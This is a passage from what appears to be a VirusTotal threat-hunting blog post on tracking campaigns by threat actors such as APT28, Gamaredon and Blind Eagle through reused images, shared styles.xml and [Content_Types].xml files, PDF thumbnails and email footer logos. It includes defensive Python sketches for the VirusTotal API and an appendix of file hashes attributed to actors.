Visualizing everything together, we find a set of about 12-14 images used within the same timeframe by the actor. All of these images can be found in the “Embassy of Ukraine in Hungary” document.

Figure 15: Pivoting through the Facebook image that included the document in Figure 14

A pattern is evident in the previous figure: different images were included in files uploaded at the same time. This pattern corresponds to multiple documents used in the same Embassy of Ukraine in Hungary campaign, all of which used the social media images described above.

Styles.xml shared between threat actors

Another aspect we explored was whether different threat actors shared similar styles.xml files in their documents. Styles.xml files are somewhat more specific and unique than [Content_Types].xml files because they can contain styles created by threat actors, or by the legitimate entities that originally created a document later modified by the actor. This makes them stand out more and can help in identifying threat actor activity.

This doesn't necessarily imply they share information to conduct separate operations, although in some cases, it could be a scenario worth considering.

Figure 16: styles.xml shared between different threat actors

Of all styles.xml files related to actors in our initial set, only six of them were found to be shared by at least two actors. Some styles defined by the styles.xml file are very generic and could identify almost any type of file. However, there are others that could be interesting to explore further.
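The cross-actor comparison can be sketched as an inverted index: map every embedded-file hash to the set of actors whose documents contain it, then keep the hashes seen for at least two actors. The function name and the placeholder hashes below are assumptions for illustration, not the tooling used in this research.

```python
from collections import defaultdict


def shared_between_actors(
    hashes_by_actor: dict[str, set[str]], min_actors: int = 2
) -> dict[str, list[str]]:
    """Return {hash: sorted actor names} for hashes seen in >= min_actors actors."""
    actors_by_hash = defaultdict(set)
    for actor, hashes in hashes_by_actor.items():
        for file_hash in hashes:
            actors_by_hash[file_hash].add(actor)
    return {
        file_hash: sorted(actors)
        for file_hash, actors in actors_by_hash.items()
        if len(actors) >= min_actors
    }


# Placeholder values standing in for real styles.xml SHA-256 hashes.
observed = {
    "Actor A": {"hash_1", "hash_2"},
    "Actor B": {"hash_2", "hash_3"},
    "Actor C": {"hash_2", "hash_4"},
}
print(shared_between_actors(observed))
```

A shared hash on its own does not prove a link between actors, since generic templates will surface here as well; the output is a list of candidates to review manually.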

An interesting case is the styles.xml file that appears to be shared by Razor Tiger, APT28, and UAC-0099. The samples from APT28 and UAC-0099 are particularly interesting because they were uploaded to VirusTotal within a short time frame, suggesting they might belong to the same threat actor.

The file 243bab79863327915c315c188c0589202f64b3500a3fee3e2c9f3d34e8e1f154 attributed to APT28, the file 2c2fa6b9fbb6aa270ba0f49ebb361ebf7d36258e1bdfd825bc2faeb738c487ed attributed to UAC-0099, and the file 61a5b971a6b5f9c2b5e9a860c996569da30369ac67108d4b8a71f58311a6e1f1 attributed to UAC-0099 all share the same styles.xml and [Content_Types].xml.

You can see the list of hashes in the appendix of this blog.

[Content_Types].xml shared between threat actors

Like in the previous case, we checked if there were Office documents among different threat actors sharing [Content_Types].xml:

Figure 17: [Content_Types].xml shared between different threat actors

In this case, there are eleven [Content_Types].xml files that are shared by at least two different actors.

An interesting case here is the file dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a, which is shared by Gamaredon, APT37, Mustang Panda, APT28, SideCopy, and UAC-0099. Again, there could be different explanations for this.

Another interesting case that is worth analyzing in detail is [Content_Types].xml with hash 4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d, which is only shared by APT28 and APT29.

You can see the list of hashes in the appendix of this blog.

AI to the rescue

Image reuse by attackers looked like a promising lead, so we decided to explore it further.

We used the VirusTotal API to download and unzip a set of Office documents used for delivery, which gave us all of their embedded images. Then we used Gemini to automatically describe what these images were about.
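A minimal sketch of that workflow follows, assuming the public VirusTotal API v3 download endpoint (which requires an API key with download privileges) and treating the image description step as a caller-supplied function. The describe callback is hypothetical: how Gemini was actually invoked is not specified here, so no Gemini API call is shown. All function names are assumptions for illustration.

```python
import io
import urllib.request
import zipfile
from typing import Callable

VT_DOWNLOAD_URL = "https://www.virustotal.com/api/v3/files/{sha256}/download"
IMAGE_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".bmp", ".emf", ".wmf")


def download_sample(sha256: str, api_key: str) -> bytes:
    """Fetch a sample from VirusTotal. Not called in this sketch."""
    request = urllib.request.Request(
        VT_DOWNLOAD_URL.format(sha256=sha256), headers={"x-apikey": api_key}
    )
    with urllib.request.urlopen(request) as response:
        return response.read()


def extract_images(doc_bytes: bytes) -> dict[str, bytes]:
    """Return {archive path: raw bytes} for images stored under a media/ folder."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as archive:
        return {
            name: archive.read(name)
            for name in archive.namelist()
            if "/media/" in name and name.lower().endswith(IMAGE_EXTENSIONS)
        }


def describe_images(
    doc_bytes: bytes, describe: Callable[[bytes], str]
) -> dict[str, str]:
    """Apply a caller-supplied describer (e.g. a wrapper around an AI model)."""
    return {name: describe(data) for name, data in extract_images(doc_bytes).items()}


# Offline demonstration with a toy archive and a stand-in describer.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/document.xml", "<document/>")
    archive.writestr("word/media/image1.png", b"fake image bytes")
descriptions = describe_images(buffer.getvalue(), lambda data: f"{len(data)} bytes")
print(descriptions)
```

Keeping the describer as a parameter makes it straightforward to swap in a real model client, or a cache keyed by image hash so that each distinct image is described only once.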

Figure 18: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors

Figure 18 shows some examples of images that were incorporated by certain actors. There were also other results that were not helpful, mainly related to images that did not show a logo or anything specific that indicated what they were.

Figure 19: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors

Using the VirusTotal API to retrieve documents of interest and combining the results with Gemini to analyze their images automatically can help analysts monitor potentially suspicious documents and build their own database of samples that use specific images, for example government imagery or company logos. This approach is interesting not only for threat hunting but also for brand monitoring.

PDF Documents

Images dropped by Acrobat Reader

Unlike Office documents, PDF files don't contain embedded XML files or images, although some PDF files may be created from Office documents. Some of our sandboxes use Adobe Acrobat Reader to open PDF documents, and Acrobat Reader generates a thumbnail of the first page in BMP format. This image is stored in the directory C:\Users\\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons. Consequently, our sandboxes provide this BMP image as a dropped file from the PDF, allowing us to pivot.

To illustrate this functionality, see Figure 20 attributed to Blind Eagle, a cybercrime actor associated with Latin America.

Figure 20: Content of a PDF file related to Blind Eagle threat actor

Figure 20 was provided by our sandbox. In the "relations" tab, we can see the BMP image as a dropped file:

Figure 21: BMP file generated by the sandbox that can be used for pivoting

The BMP file itself also shows relations, in particular up to 6 PDF files in the "execution parents" section. In other words, there are other PDFs that look exactly the same as the initial one.
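The same pivot can be scripted. The sketch below assumes the VirusTotal API v3 relationship endpoints for file objects (such as execution_parents and compressed_parents), which may require a premium API key. The function names are illustrative, and pagination through the response's cursor is omitted for brevity.

```python
import json
import urllib.request

VT_RELATIONSHIP_URL = "https://www.virustotal.com/api/v3/files/{file_id}/{relationship}"


def build_relationship_request(
    file_id: str, relationship: str, api_key: str
) -> urllib.request.Request:
    """Prepare an authenticated request for one relationship of a file object."""
    url = VT_RELATIONSHIP_URL.format(file_id=file_id, relationship=relationship)
    return urllib.request.Request(url, headers={"x-apikey": api_key})


def related_hashes(response_body: dict) -> list[str]:
    """Extract object identifiers from a relationship response body."""
    return [item["id"] for item in response_body.get("data", [])]


def fetch_related(file_id: str, relationship: str, api_key: str) -> list[str]:
    """Perform the HTTP call (first page only). Not called in this sketch."""
    request = build_relationship_request(file_id, relationship, api_key)
    with urllib.request.urlopen(request) as response:
        return related_hashes(json.load(response))


# Offline demonstration with a response shaped like the API's JSON envelope.
sample_response = {
    "data": [
        {"type": "file", "id": "pdf_hash_1"},
        {"type": "file", "id": "pdf_hash_2"},
    ]
}
print(related_hashes(sample_response))
```

Calling fetch_related with the BMP thumbnail's hash and "execution_parents" would list the PDFs that produced the same thumbnail; with "compressed_parents" it would list the Office documents embedding a given image.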

Typically, many actors engaged in financial crime activities utilize widely spread PDF files to deceive their victims, making this approach highly valuable. Another interesting example we found involves phishing activities targeting a Russian bank called "Tinkoff Bank."

The PDF files urge victims to accept an invitation from this bank to participate in a project.

Figure 22: The content of a PDF file used by cybercrime actors

Applying the same approach, we identified 20 files with identical content, most of them classified as malicious by AV engines.

Figure 23: BMP file generated by the sandbox that can be used for pivoting, in this case with 20 other PDFs sharing the same image

There are some limitations to this approach. For instance, the PDF file might be slightly modified (font size, some letter/word, color, …) which would generate a completely different hash value for the thumbnail we use to pivot.
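To see why even a minor visual change breaks the pivot, the short sketch below compares the SHA-256 digests of two byte strings that differ in a single byte. The byte strings are stand-ins for thumbnail data rather than real BMP files, and the helper name is an assumption for illustration.

```python
import hashlib


def differing_bits(first: bytes, second: bytes) -> int:
    """Count the bits that differ between the SHA-256 digests of two inputs."""
    digest_a = hashlib.sha256(first).digest()
    digest_b = hashlib.sha256(second).digest()
    return sum(bin(x ^ y).count("1") for x, y in zip(digest_a, digest_b))


# Stand-in "thumbnails": identical except for one byte in the middle.
original = bytes(1000)
modified = bytearray(original)
modified[500] = 1

print(hashlib.sha256(original).hexdigest())
print(hashlib.sha256(bytes(modified)).hexdigest())
print(differing_bits(original, bytes(modified)), "of 256 digest bits differ")
```

Because a cryptographic hash gives no indication of how similar two inputs are, exact-hash pivoting only finds byte-identical thumbnails.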

Other artifacts dropped during detonation

Just like the BMP files generated by Acrobat Reader, there are other interesting files that might be dropped during sandbox detonation. These artifacts can be useful on some occasions.

The first example is a JavaScript file dropped in another PDF attributed to Blind Eagle.

Figure 24: BMP file generated by the sandbox that can be used for pivoting, another example of Blind Eagle threat actor

The name of the JavaScript file dropped during the PDF execution was "Chrome Cache Entry: 566", indicating that this file was likely generated by opening a URL through Chrome, possibly triggered by a sandbox click on a link within the PDF. Examining the file's contents, we observe some strings and variables in Spanish.

Figure 25: Artifact generated by the sandbox via Google Chrome when connecting to a domain

We were able to confirm that the strings “registerResourceDictionary”, “sampleCustomStringId”, and “rf_RefinementTitle_ManagedPropertyName” are related to Microsoft SharePoint. These files were probably generated after visiting sites that use Microsoft SharePoint functionality. We found that all the PDFs containing this artifact dropped by Google Chrome came from a website belonging to the Government of Colombia.

Figure 26: Flow of artifact generation related to Google Chrome that can be used for pivoting in VirusTotal

Email files

Many threat actors incorporate images in their emails, such as company logos, to deceive victims. We used this to identify several mailing campaigns where the same footer was used.

Campaign impersonating universities

On November 13, 2023, we shared details about a new campaign impersonating universities, primarily located in Latin America. By leveraging the presence of social network logos in the footer, we were able to find more universities on different continents targeted by the same attacker.

Figure 27: Email impersonating a university that contains multiple images

Figure 27 shows several images, including the University of Chile's logo and building, as well as images related to social networks like YouTube, Facebook, and Twitter.

Pivoting through the images related to the University of Chile doesn't yield good results, as it's too specific. However, if we pivot through the images of the social media footer, represented as email attachments, we can observe multiple files using the same logo.

Figure 28: Using the images from the email footer to pivot and identify new emails

Just by analyzing one of the social media logos, we saw 33 email parents, all of them related to the same campaign.

Figure 29: Other emails identified through image pivoting techniques

Campaigns impersonating companies

Another common case is adding a company logo to the email signature to enhance credibility. Logos of delivery companies, banks, and suppliers were among the images we observed most often during our research.

For example, this email utilizes the corporate image of China Anhui Technology Import and Export Co Ltd in the footer.

Figure 30: Email impersonating a Chinese organization using the company logo in the footer

Pivoting through the image, we found 20 emails using the same logo.

Figure 31: Other emails identified through image pivoting techniques

Wrapping up

We can potentially trace malicious actors by examining artifacts linked to the initial spreading documents, and in the case of images, AI can help us automate potential victim identification and other hunting aspects.

To make this even easier, we are planning to incorporate a new bundled_files field into the IOCs JSON structure, which will help in creating Livehunt rules. In the meantime, you can use vt_behaviour_files_dropped.sha256 for scenarios where the files are dropped.

In certain situations, the styles.xml and [Content_Types].xml files within office documents can provide valuable clues for identifying and tracking the same threat actor. The method presented here offers an alternative to traditional hunting or pivoting techniques, serving as a valuable addition to a team's hunting activities.

We hope you found this research interesting and useful, and as always we are happy to hear your feedback.

Happy hunting!

APPENDIX

[Content_Types].xml shared between threat actors

[Content_Types].xml sha256	Shared by
3d8578fd41d766740a1f1ddef972a081436a2d70ab1e9552a861e58d8bbf5321	APT33, APT32
4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d	APT29, APT28
4f7fa7433484b4e655d185719613e2f98d017590146d15eedc1aa1d967636b3a	FIN7, Gamaredon, APT28, APT32
529739886f6402a9cd5a8064ece73eef19c597ef35c0bc8d09390e8b4de9041b	FIN7, APT33, TA505, Mustang Panda
688dca40507fb96630f3df80442266a0354e7c24b7df86be3ea57069b25d12c6	Gamaredon, APT33
6f1ac5f0ebfb7e97d3dc4100e88eaab10016a5cac75e1251781f2ea12477af51	Gamaredon, Hazy Tiger, APT33
7796c382cd4c7c4ae3bcf2eed4091fbb20a2563ca88f2aecadb950ad9cf661f8	Razor Tiger, APT28, UAC-0099
b4fa7f3faa0510e4d969219bceec2a90e8a48ff28e060db3cdd37ce935c3779c	Razor Tiger, SideCopy
dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a	Gamaredon, APT37, Mustang Panda, APT28, UAC-0099, SideCopy
fe98b3bcf96f9c396eb9193f0f9484ef01d3017257300cc76098854b1f103b69	FIN7, Hazy Tiger
ff5a5ba3730a8d2ec0cbad39e5edf4ad502107bd0ef8a5347f29262b3dfe8a43	Mustang Panda, APT32

styles.xml shared between threat actors

Styles.xml sha256	Shared by
13ed55637980452662cb6838a2931a5e54fbed5881bcbae368b3d189d3a01930	APT28, UAC-0099, Razor Tiger
2de1fc9c48c4b0190361c49cdb053fd39cf81e32f12c82d08f88aec34358257f	Hazy Tiger, Gamaredon, APT33
59df7787c7cf5408481ae149660858d3af765a0c2cd63d6309b151380f92adb2	TA505, Gamaredon
8f590f608f0719404a1731bb70a6ce2db420fd61e5a387d5b3091d47c7e21ac9	APT28, FIN7, Razor Tiger, APT32, APT33
de392cd4bf1d650a9cf8c6d24e05e0605bf4eaf1518710f0307d8aceb9e5496c	Hazy Tiger, FIN7
e16f84c5fd1df6af1a1f2049f7862f4ea460765863476afb17e78edee772d35b	APT32, SideCopy, Mustang Panda, Razor Tiger